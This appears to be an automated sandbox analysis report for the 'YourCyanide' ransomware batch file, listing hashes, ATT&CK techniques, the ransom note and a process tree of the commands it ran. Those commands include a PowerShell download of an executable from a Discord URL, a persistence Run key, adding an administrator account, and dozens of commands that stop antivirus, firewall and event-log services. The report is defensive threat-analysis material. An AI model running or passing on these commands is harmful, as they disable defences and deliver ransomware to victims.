e8266fb4c02fdf3d4b449814100c4839a52ceeeeb175f816b357cb695b4b1751

Analysis

max time kernel
150s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
19/05/2022, 17:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

YourCyanide_obf.bat
Size

136KB
MD5

60105b0d25a609bbf93236f003064d2c
SHA1

bf5fae15e830e6793d2b5b60af0cbb92a4098663
SHA256

e8266fb4c02fdf3d4b449814100c4839a52ceeeeb175f816b357cb695b4b1751
SHA512

b6d4259a2e1eca153d39299d1cfa16b2f1b07eead78b1afc8b4ebd6af17805c6d1112c6ed82e362430b7d6bf180822a3c44e819593da724706499e4c04b7d89c

Score

10^/10

evasion persistence ransomware

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe

Extracted

Path

C:\Users\Admin\Desktop\YcynNote.txt

Ransom Note

Q: What happened to my files? A: Oops your files have been encrypted by YourCyanide. Q: how can I get them back? A: You can get them back by paying $500 in bitcoin to this btc wallet bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf. Q: What happens if I dont pay? A: You will never get your files back. A: contact at [email protected]. ++++++++++++++++++++++++++++++++++++++++++++ 26647 Files have been encrypted

Emails

[email protected]

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 1 IoCs

flow	pid	Process
7	1512	powershell.exe

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
3412	NoKeyB.exe
4244	Process not Found

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	cmd.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_31474_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\YourCyanide_obf.bat"	reg.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Confession.bat	cmd.exe
File opened for modification	C:\Windows\Confession.bat	cmd.exe
File opened for modification	C:\Windows\win.ini	cmd.exe
File opened for modification	C:\Windows\system.ini	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
1412	tasklist.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
1296	ipconfig.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5068	systeminfo.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4516	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings	cmd.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\%etozn:~1	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\%tmDUu:~17	cmd.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
748	NOTEPAD.EXE

Runs net.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

pid	Process
1408	powershell.exe
1408	powershell.exe
1408	powershell.exe
1512	powershell.exe
1512	powershell.exe
2320	powershell.exe
2320	powershell.exe
4856	powershell.exe
4856	powershell.exe
2136	scrnsave.scr
2136	scrnsave.scr
2340	netsh.exe
2340	netsh.exe
2320	netsh.exe
2136	scrnsave.scr
4856	powershell.exe
2320	netsh.exe
2340	netsh.exe
4856	powershell.exe
2136	scrnsave.scr
2340	netsh.exe
3708	scrnsave.scr
3708	scrnsave.scr
3708	scrnsave.scr
3604	Process not Found
3604	Process not Found
3604	Process not Found

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	1408	powershell.exe
Token: SeDebugPrivilege	1512	powershell.exe
Token: SeDebugPrivilege	4516	taskkill.exe
Token: SeDebugPrivilege	2320	powershell.exe
Token: SeDebugPrivilege	4856	powershell.exe
Token: SeDebugPrivilege	2136	scrnsave.scr
Token: SeDebugPrivilege	2340	netsh.exe
Token: SeDebugPrivilege	3708	scrnsave.scr
Token: SeDebugPrivilege	3604	Process not Found

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3412	NoKeyB.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
3412	NoKeyB.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3412	NoKeyB.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1496 wrote to memory of 1548	1496	cmd.exe	82
PID 1496 wrote to memory of 1548	1496	cmd.exe	82
PID 1496 wrote to memory of 1408	1496	cmd.exe	83
PID 1496 wrote to memory of 1408	1496	cmd.exe	83
PID 1496 wrote to memory of 1760	1496	cmd.exe	84
PID 1496 wrote to memory of 1760	1496	cmd.exe	84
PID 1760 wrote to memory of 4476	1760	net.exe	85
PID 1760 wrote to memory of 4476	1760	net.exe	85
PID 1496 wrote to memory of 1956	1496	cmd.exe	86
PID 1496 wrote to memory of 1956	1496	cmd.exe	86
PID 1496 wrote to memory of 2184	1496	cmd.exe	87
PID 1496 wrote to memory of 2184	1496	cmd.exe	87
PID 1496 wrote to memory of 2556	1496	cmd.exe	88
PID 1496 wrote to memory of 2556	1496	cmd.exe	88
PID 1496 wrote to memory of 1512	1496	cmd.exe	89
PID 1496 wrote to memory of 1512	1496	cmd.exe	89
PID 1496 wrote to memory of 3412	1496	cmd.exe	90
PID 1496 wrote to memory of 3412	1496	cmd.exe	90
PID 1496 wrote to memory of 3088	1496	cmd.exe	91
PID 1496 wrote to memory of 3088	1496	cmd.exe	91
PID 3088 wrote to memory of 4532	3088	net.exe	92
PID 3088 wrote to memory of 4532	3088	net.exe	92
PID 1496 wrote to memory of 3888	1496	cmd.exe	93
PID 1496 wrote to memory of 3888	1496	cmd.exe	93
PID 3888 wrote to memory of 3488	3888	net.exe	94
PID 3888 wrote to memory of 3488	3888	net.exe	94
PID 1496 wrote to memory of 4516	1496	cmd.exe	95
PID 1496 wrote to memory of 4516	1496	cmd.exe	95
PID 1496 wrote to memory of 4196	1496	cmd.exe	96
PID 1496 wrote to memory of 4196	1496	cmd.exe	96
PID 4196 wrote to memory of 2300	4196	net.exe	97
PID 4196 wrote to memory of 2300	4196	net.exe	97
PID 1496 wrote to memory of 2304	1496	cmd.exe	98
PID 1496 wrote to memory of 2304	1496	cmd.exe	98
PID 2304 wrote to memory of 4864	2304	net.exe	99
PID 2304 wrote to memory of 4864	2304	net.exe	99
PID 1496 wrote to memory of 4788	1496	cmd.exe	100
PID 1496 wrote to memory of 4788	1496	cmd.exe	100
PID 1496 wrote to memory of 1768	1496	cmd.exe	101
PID 1496 wrote to memory of 1768	1496	cmd.exe	101
PID 1768 wrote to memory of 1296	1768	net.exe	102
PID 1768 wrote to memory of 1296	1768	net.exe	102
PID 1496 wrote to memory of 3584	1496	cmd.exe	103
PID 1496 wrote to memory of 3584	1496	cmd.exe	103
PID 3584 wrote to memory of 2392	3584	net.exe	104
PID 3584 wrote to memory of 2392	3584	net.exe	104
PID 1496 wrote to memory of 4972	1496	cmd.exe	105
PID 1496 wrote to memory of 4972	1496	cmd.exe	105
PID 4972 wrote to memory of 2324	4972	net.exe	106
PID 4972 wrote to memory of 2324	4972	net.exe	106
PID 1496 wrote to memory of 4540	1496	cmd.exe	107
PID 1496 wrote to memory of 4540	1496	cmd.exe	107
PID 4540 wrote to memory of 4876	4540	net.exe	108
PID 4540 wrote to memory of 4876	4540	net.exe	108
PID 1496 wrote to memory of 220	1496	cmd.exe	109
PID 1496 wrote to memory of 220	1496	cmd.exe	109
PID 220 wrote to memory of 100	220	net.exe	110
PID 220 wrote to memory of 100	220	net.exe	110
PID 1496 wrote to memory of 1732	1496	cmd.exe	111
PID 1496 wrote to memory of 1732	1496	cmd.exe	111
PID 1732 wrote to memory of 4256	1732	net.exe	112
PID 1732 wrote to memory of 4256	1732	net.exe	112
PID 1496 wrote to memory of 1412	1496	cmd.exe	113
PID 1496 wrote to memory of 1412	1496	cmd.exe	113

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\YourCyanide_obf.bat"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:1496
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\HideyHidey.vbs"
  2⤵
  PID:1548
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Set-ExecutionPolicy Unrestricted"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1408
- C:\Windows\system32\net.exe
  net localgroup administrators session /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1760
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup administrators session /ADD
    3⤵
    PID:4476
- C:\Windows\system32\reg.exe
  reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_31474_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\YourCyanide_obf.bat /f
  2⤵
  - Adds Run key to start application
  PID:1956
- C:\Windows\system32\reg.exe
  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
  2⤵
  PID:2184
- C:\Windows\system32\rundll32.exe
  RUNDLL32 USER32.DLL SwapMouseButton
  2⤵
  PID:2556
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe', 'NoKeyB.exe')"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1512
- C:\Users\Admin\Documents\NoKeyB.exe
  NoKeyB.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:3412
- C:\Windows\system32\net.exe
  net stop "wuauserv"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3088
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "wuauserv"
    3⤵
    PID:4532
- C:\Windows\system32\net.exe
  net stop "WinDefend"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3888
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "WinDefend"
    3⤵
    PID:3488
- C:\Windows\system32\taskkill.exe
  taskkill /f /t /im "MSASCui.exe"
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4516
- C:\Windows\system32\net.exe
  net stop "security center"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4196
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "security center"
    3⤵
    PID:2300
- C:\Windows\system32\net.exe
  net stop sharedaccess
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2304
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sharedaccess
    3⤵
    PID:4864
- C:\Windows\system32\netsh.exe
  netsh firewall set opmode mode-disable
  2⤵
  PID:4788
- C:\Windows\system32\net.exe
  net stop "Security Center" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1768
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Security Center" /y
    3⤵
    PID:1296
- C:\Windows\system32\net.exe
  net stop "Automatic Updates" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3584
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Automatic Updates" /y
    3⤵
    PID:2392
- C:\Windows\system32\net.exe
  net stop "Symantec Core LC" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4972
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec Core LC" /y
    3⤵
    PID:2324
- C:\Windows\system32\net.exe
  net stop "SAVScan" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4540
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SAVScan" /y
    3⤵
    PID:4876
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Firewall Monitor Service" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:220
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y
    3⤵
    PID:100
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Auto-Protect Service" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1732
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y
    3⤵
    PID:4256
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Auto Protect Service" /y
  2⤵
  PID:1412
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
    3⤵
    PID:5032
- C:\Windows\system32\net.exe
  net stop "McAfee Spamkiller Server" /y
  2⤵
  PID:4812
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y
    3⤵
    PID:2896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup administrators session /ADD
    3⤵
    PID:1592
- C:\Windows\system32\net.exe
  net stop "McAfee Personal Firewall Service" /y
  2⤵
  PID:2816
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y
    3⤵
    PID:1728
- C:\Windows\system32\net.exe
  net stop "McAfee SecurityCenter Update Manager" /y
  2⤵
  PID:3316
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y
    3⤵
    PID:3664
- C:\Windows\system32\net.exe
  net stop "Symantec SPBBCSvc" /y
  2⤵
  PID:1212
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y
    3⤵
    PID:2652
- C:\Windows\system32\net.exe
  net stop "Ahnlab Task Scheduler" /y
  2⤵
  PID:1316
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Ahnlab Task Scheduler" /y
    3⤵
    PID:3372
- C:\Windows\system32\net.exe
  net stop navapsvc /y
  2⤵
  PID:1988
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop navapsvc /y
    3⤵
    PID:1404
- C:\Windows\system32\net.exe
  net stop "Sygate Personal Firewall Pro" /y
  2⤵
  PID:3784
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
    3⤵
    PID:3344
- C:\Windows\system32\net.exe
  net stop vrmonsvc /y
  2⤵
  PID:1856
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop vrmonsvc /y
    3⤵
    PID:3256
- C:\Windows\system32\net.exe
  net stop MonSvcNT /y
  2⤵
  PID:3996
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MonSvcNT /y
    3⤵
    PID:1880
- C:\Windows\system32\net.exe
  net stop SAVScan /y
  2⤵
  PID:4092
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAVScan /y
    3⤵
    PID:2908
- C:\Windows\system32\net.exe
  net stop NProtectService /y
  2⤵
  PID:4012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NProtectService /y
    3⤵
    PID:3716
- C:\Windows\system32\net.exe
  net stop ccSetMGR /y
  2⤵
  PID:3760
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMGR /y
    3⤵
    PID:4908
- C:\Windows\system32\net.exe
  net stop ccEvtMGR /y
  2⤵
  PID:3976
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMGR /y
    3⤵
    PID:3812
- C:\Windows\system32\net.exe
  net stop srservice /y
  2⤵
  PID:820
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop srservice /y
    3⤵
    PID:616
- C:\Windows\system32\net.exe
  net stop "Symantec Network Drivers Service" /y
  2⤵
  PID:2364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y
    3⤵
    PID:2768
- C:\Windows\system32\net.exe
  net stop "norton Unerase Protection" /y
  2⤵
  PID:3676
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton Unerase Protection" /y
    3⤵
    PID:2244
- C:\Windows\system32\net.exe
  net stop MskService /y
  2⤵
  PID:3688
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MskService /y
    3⤵
    PID:524
- C:\Windows\system32\net.exe
  net stop MpfService /y
  2⤵
  PID:2108
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MpfService /y
    3⤵
    PID:3200
- C:\Windows\system32\net.exe
  net stop mcupdmgr.exe /y
  2⤵
  PID:3120
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mcupdmgr.exe /y
    3⤵
    PID:3272
- C:\Windows\system32\net.exe
  net stop "McAfeeAntiSpyware" /y
  2⤵
  PID:1516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y
    3⤵
    PID:3288
- C:\Windows\system32\net.exe
  net stop helpsvc /y
  2⤵
  PID:3404
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop helpsvc /y
    3⤵
    PID:3224
- C:\Windows\system32\net.exe
  net stop ERSvc /y
  2⤵
  PID:1408
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ERSvc /y
    3⤵
    PID:4728
- C:\Windows\system32\net.exe
  net stop "*norton*" /y
  2⤵
  PID:1712
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "*norton*" /y
    3⤵
    PID:1968
- C:\Windows\system32\net.exe
  net stop "*Symantec*" /y
  2⤵
  PID:2404
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "*Symantec*" /y
    3⤵
    PID:2416
- C:\Windows\system32\net.exe
  net stop "*McAfee*" /y
  2⤵
  PID:2556
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "*McAfee*" /y
    3⤵
    PID:2356
- C:\Windows\system32\net.exe
  net stop ccPwdSvc /y
  2⤵
  PID:4952
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccPwdSvc /y
    3⤵
    PID:5060
- C:\Windows\system32\net.exe
  net stop "Symantec Core LC" /y
  2⤵
  PID:2708
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec Core LC" /y
    3⤵
    PID:2700
- C:\Windows\system32\net.exe
  net stop navapsvc /y
  2⤵
  PID:2740
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop navapsvc /y
    3⤵
    PID:1484
- C:\Windows\system32\net.exe
  net stop "Serv-U" /y
  2⤵
  PID:4548
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Serv-U" /y
    3⤵
    PID:1312
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Auto Protect Service" /y
  2⤵
  PID:4552
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
    3⤵
    PID:4428
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Client" /y
  2⤵
  PID:4480
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Client" /y
    3⤵
    PID:4504
- C:\Windows\system32\net.exe
  net stop "Symantec AntiVirus Client" /y
  2⤵
  PID:4440
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y
    3⤵
    PID:2040
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Server" /y
  2⤵
  PID:1656
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Server" /y
    3⤵
    PID:2300
- C:\Windows\system32\net.exe
  net stop "NAV Alert" /y
  2⤵
  PID:4804
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "NAV Alert" /y
    3⤵
    PID:4568
- C:\Windows\system32\net.exe
  net stop "Nav Auto-Protect" /y
  2⤵
  PID:3204
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Nav Auto-Protect" /y
    3⤵
    PID:4696
- C:\Windows\system32\net.exe
  net stop "McShield" /y
  2⤵
  PID:528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McShield" /y
    3⤵
    PID:2536
- C:\Windows\system32\net.exe
  net stop "DefWatch" /y
  2⤵
  PID:1768
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "DefWatch" /y
    3⤵
    PID:2136
- C:\Windows\system32\net.exe
  net stop eventlog /y
  2⤵
  PID:5044
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop eventlog /y
    3⤵
    PID:2664
- C:\Windows\system32\net.exe
  net stop InoRPC /y
  2⤵
  PID:4788
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop InoRPC /y
    3⤵
    PID:4244
- C:\Windows\system32\net.exe
  net stop InoRT /y
  2⤵
  PID:5088
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop InoRT /y
    3⤵
    PID:5056
- C:\Windows\system32\net.exe
  net stop InoTask /y
  2⤵
  PID:204
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop InoTask /y
    3⤵
    PID:220
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Auto Protect Service" /y
  2⤵
  PID:3956
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Client" /y
  2⤵
  PID:1264
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Client" /y
    3⤵
    PID:5032
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Corporate Edition" /y
  2⤵
  PID:1412
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y
    3⤵
    PID:968
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup administrators session /ADD
    3⤵
    PID:3532
- C:\Windows\system32\net.exe
  net stop "ViRobot Professional Monitoring" /y
  2⤵
  PID:1704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y
    3⤵
    PID:3852
- C:\Windows\system32\net.exe
  net stop "PC-cillin Personal Firewall" /y
  2⤵
  PID:4580
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y
    3⤵
    PID:3504
- C:\Windows\system32\net.exe
  net stop "Trend Micro Proxy Service" /y
  2⤵
  PID:5016
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y
    3⤵
    PID:4288
- C:\Windows\system32\net.exe
  net stop "Trend NT Realtime Service" /y
  2⤵
  PID:3836
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Trend NT Realtime Service" /y
    3⤵
    PID:2652
- C:\Windows\system32\net.exe
  net stop "McAfee.com McShield" /y
  2⤵
  PID:1212
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee.com McShield" /y
    3⤵
    PID:3012
- C:\Windows\system32\net.exe
  net stop "McAfee.com VirusScan Online Realtime Engine" /y
  2⤵
  PID:4892
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y
    3⤵
    PID:3668
- C:\Windows\system32\net.exe
  net stop "SyGateService" /y
  2⤵
  PID:1960
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SyGateService" /y
    3⤵
    PID:1992
- C:\Windows\system32\net.exe
  net stop "Sygate Personal Firewall Pro" /y
  2⤵
  PID:3884
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
    3⤵
    PID:3784
- C:\Windows\system32\net.exe
  net stop "Sophos Anti-Virus" /y
  2⤵
  PID:3100
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Anti-Virus" /y
    3⤵
    PID:3104
- C:\Windows\system32\net.exe
  net stop "Sophos Anti-Virus Network" /y
  2⤵
  PID:3256
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y
    3⤵
    PID:2004
- C:\Windows\system32\net.exe
  net stop "eTrust Antivirus Job Server" /y
  2⤵
  PID:1820
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y
    3⤵
    PID:2308
- C:\Windows\system32\net.exe
  net stop "eTrust Antivirus Realtime Server" /y
  2⤵
  PID:3708
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y
    3⤵
    PID:2348
- C:\Windows\system32\net.exe
  net stop "Sygate Personal Firewall Pro" /y
  2⤵
  PID:3640
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
    3⤵
    PID:2012
- C:\Windows\system32\net.exe
  net stop "eTrust Antivirus RPC Server" /y
  2⤵
  PID:3400
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y
    3⤵
    PID:3716
- C:\Windows\system32\net.exe
  net stop netsvcs
  2⤵
  PID:4012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop netsvcs
    3⤵
    PID:4900
- C:\Windows\system32\net.exe
  net stop spoolnt
  2⤵
  PID:4904
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop spoolnt
    3⤵
    PID:748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K 2b2crypt.cmd
  2⤵
  PID:3704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K 2b2crypt.m.cmd
  2⤵
  PID:2008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K black.bat
  2⤵
  PID:1944
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1408
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2184
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4496
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5072
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2896
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3232
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4092
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:728
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5108
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2136
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2904
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3168
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4836
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5056
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4872
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3340
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3316
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2188
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1752
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3092
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4180
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3340
- - C:\Windows\system32\scrnsave.scr
